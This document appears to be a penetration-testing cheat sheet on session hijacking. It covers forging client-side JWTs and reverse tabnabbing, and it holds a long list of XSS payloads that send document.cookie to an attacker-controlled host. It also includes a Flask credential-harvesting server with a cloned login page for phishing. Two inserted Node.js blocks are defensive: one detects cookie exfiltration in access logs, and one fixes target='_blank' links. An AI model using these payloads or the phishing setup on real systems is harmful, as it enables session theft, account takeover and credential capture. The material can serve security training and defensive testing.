
Session Hijacking

Client-Side JWT Attack

If no cookies are set before registration or login, it is quite possible that the authorization process is being handled client-side.


Enumeration

  1. Open the browser's developer tools and look within the lib folder for the file related to JWT; it is normally called jwt.js or jwt.ts.

  2. Look for the JWT_SECRET and the signing methods.

  3. Use jwt.io or the JWT Editor extension from Burp Suite to craft a new token signed with the secret and give it the admin role.

Stealing Cookies via XSS

Error-Based Cookie Stealing

  • Trigger & manipulate Error Events

Basic image error trigger
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
Using document.location
<img src=1 onerror="document.location='http://<YOUR_SERVER_IP>/'+ document.cookie">
Redirect
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">

Image-Based Cookie Stealing

Image object via script
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
Variable assignment method
<script>var i=new Image(); i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie;</script>

Location-Based Cookie Stealing

Basic location redirect
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Alternative location syntax
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Document location method
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Document location method + Redirect
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Window location method
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
Window location method Dynamically
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
Window location method + Redirect
<script>window['location']['href']='http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
String concatenation methods (dynamically join the URL and cookies to redirect)
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
Location + redirect with concatenation of cookies
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>

Advanced Cookie Stealing Methods

Audio object method
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
Document write method
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
XMLHttpRequest method
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="+document.cookie, true);xhttp.send();</script>
Fetch API method to avoid response handling:
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
SendBeacon API (stealthier)
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>

DOM-Stored Cookie Extraction

Extract cookies stored in DOM elements
window.addEventListener('DOMContentLoaded', function(e) {
    window.location = "http://10.10.16.8:4444/?tokyo=" + encodeURI(document.getElementsByName("cookie")[0].value)
})
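All of the payloads above end up as a request to the attacker's host with the victim's cookies in the URL, so the exfiltration is visible in ordinary access logs (on the receiving host, or on a proxy that sees the outbound request). Added example, not from the original page: a small Node.js detector that parses combined-format access-log lines and flags requests whose query string, once decoded, contains a known session cookie name. The log format, the cookie-name list and the sample lines are constructed for the example.

```javascript
// Added example (not from the original page): flag access-log requests that carry
// session cookies in the query string, the footprint left by the payloads above.

// Session cookie names to look for once the query string has been decoded (assumed list).
const SESSION_COOKIE_NAMES = ['PHPSESSID', 'JSESSIONID', 'connect.sid', 'session', 'sessionid', 'token'];

// Apache/nginx "combined" format: ip - - [time] "METHOD path HTTP/x" status size "referer" "ua"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch { return s; }
}

// Returns the session-cookie names found in a request path's query string, or [] if none.
function cookieNamesInQuery(path) {
  const q = path.indexOf('?');
  if (q === -1) return [];
  // Payloads use "?c=", "?cookie=", a comma from .join() and bare "?c" + cookie,
  // so decode the whole query and look for name=value pairs anywhere in it.
  const decoded = safeDecode(path.slice(q + 1));
  return SESSION_COOKIE_NAMES.filter(name =>
    new RegExp(`(^|[?&;,=\\s])${name.replace('.', '\\.')}=`).test(decoded));
}

// Parses each line and returns one hit object per request that looks like cookie exfil.
function findCookieExfil(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = LOG_RE.exec(line);
    if (!m) continue; // not a combined-format line
    const [, ip, time, method, path, status, referer] = m;
    const cookies = cookieNamesInQuery(path);
    if (cookies.length === 0) continue;
    hits.push({ ip, time, method, path, status, referer, cookies });
  }
  return hits;
}

// Constructed sample lines: a benign request, one matching the "?c=" payload,
// one from the .join() variant, and a sendBeacon-style POST whose cookie is in
// the body and therefore invisible to this check.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /?c=PHPSESSID%3Dabc123%3B%20theme%3Ddark HTTP/1.1" 404 0 "https://victim.example/profile" "Mozilla/5.0"',
  '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /?c,JSESSIONID=9F2A HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [10/Oct/2023:13:56:05 +0000] "POST /x/AAAAA HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
];

// Stand-alone demonstration over the constructed sample.
for (const hit of findCookieExfil(SAMPLE_LOG)) {
  console.log(`${hit.time} ${hit.ip} ${hit.method} ${hit.path} -> ${hit.cookies.join(',')}`);
}
```

The sendBeacon and fetch variants put the cookie in the POST body rather than the URL, so this check does not see them; catching those needs request-body logging or egress monitoring. The mitigation that removes the whole class is the HttpOnly flag on the session cookie, which keeps document.cookie from exposing it in the first place, together with a CSP that restricts where scripts may send data.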
Reverse Tabnabbing

Documentation and original Writeup


If the link uses target="_blank" and doesn’t include rel="noopener" or rel="noreferrer", the new tab gets access to the original page via the window.opener object.

Vulnerable link
<a href="https://attacker-site.com" target="_blank">View article</a>
On the attacker site
window.opener.location = 'https://phishing-site.com/login';
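One way to check for and fix the vulnerable link pattern described above, as an added example that is not part of the original page: a Node.js lint that scans an HTML string for anchors with target="_blank" that lack rel="noopener" or rel="noreferrer", and a rewriter that adds them so the opened page gets no window.opener. The regex-based tag parsing and the sample HTML are assumptions for the example.

```javascript
// Added example (not from the original page): find and fix <a target="_blank">
// links that leak window.opener. Regex over opening <a> tags is enough for a
// lint-style check; a DOM-based sanitizer would do the same through element.rel.

const ANCHOR_RE = /<a\b[^>]*>/gi;

// Read one attribute value from an opening tag (double-, single- or unquoted).
function attr(tag, name) {
  const m = new RegExp(`\\b${name}\\s*=\\s*("([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i').exec(tag);
  return m ? (m[2] ?? m[3] ?? m[4]) : null;
}

// A link is safe if it opens in the same tab or carries noopener/noreferrer.
function isOpenerSafe(tag) {
  const target = attr(tag, 'target');
  if (!target || target.toLowerCase() !== '_blank') return true;
  const rel = (attr(tag, 'rel') || '').toLowerCase().split(/\s+/);
  return rel.includes('noopener') || rel.includes('noreferrer');
}

// Returns the opening tag of every link that would expose window.opener.
function findTabnabbingLinks(html) {
  return (html.match(ANCHOR_RE) || []).filter(tag => !isOpenerSafe(tag));
}

// Adds rel="noopener noreferrer" (merged with any existing rel) to every unsafe link.
function fixTabnabbingLinks(html) {
  return html.replace(ANCHOR_RE, tag => {
    if (isOpenerSafe(tag)) return tag;
    const existing = attr(tag, 'rel');
    const tokens = existing ? existing.split(/\s+/).filter(Boolean) : [];
    const merged = [...new Set([...tokens, 'noopener', 'noreferrer'])].join(' ');
    if (existing !== null) {
      return tag.replace(/\brel\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/i, `rel="${merged}"`);
    }
    return tag.replace(/\s*>$/, ` rel="${merged}">`);
  });
}

// Constructed sample: the vulnerable link from the section above plus safe variants.
const SAMPLE_HTML = `
<a href="https://attacker-site.com" target="_blank">View article</a>
<a href="/local" target="_blank" rel="noopener">Safe</a>
<a href="/same-tab">Same tab</a>
<a href="https://example.org" target="_blank" rel="nofollow">Tagged</a>`;

// Stand-alone demonstration.
console.log('unsafe links:', findTabnabbingLinks(SAMPLE_HTML));
console.log(fixTabnabbingLinks(SAMPLE_HTML));
```

Current browsers already treat target="_blank" as implying noopener, but an explicit rel still matters for older browsers and for links opened through window.open, where noopener has to be passed in the feature string.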

Craft the phishing attack

Set up a Flask web server:
from flask import Flask, request, render_template

app = Flask(__name__)

@app.route('/writeup.html', methods=['GET'])
def writeup():
    return render_template('writeup.html')

@app.route('/accounts/login/', methods=['GET', 'POST'])
def login():
    if request.method == "POST":
        username = request.form.get('login')
        password = request.form.get('password')
        print("Got username and password: {}:{}".format(username, password))
        return render_template('login.html')
    else:
        return render_template('login.html')

app.run(host="10.10.14.172", port=8000)
Alter the .html file to redirect to your own version of login.html:
<!doctype html>
<html>
  <body>
    Example Writeup
    <script>
      if (window.opener)
        window.opener.parent.location.replace('http://10.10.14.172/accounts/login/');
      if (window.parent != window)
        window.parent.location.replace('http://10.10.14.172/accounts/login/');
    </script>
  </body>
</html>
Clone the login page for the platform:
wget http://developer.htb/accounts/login/ -O templates/login.html
  • Change the CSS and JS imports to point to a more credible site.

  • Launch the attack by submitting the .html file.
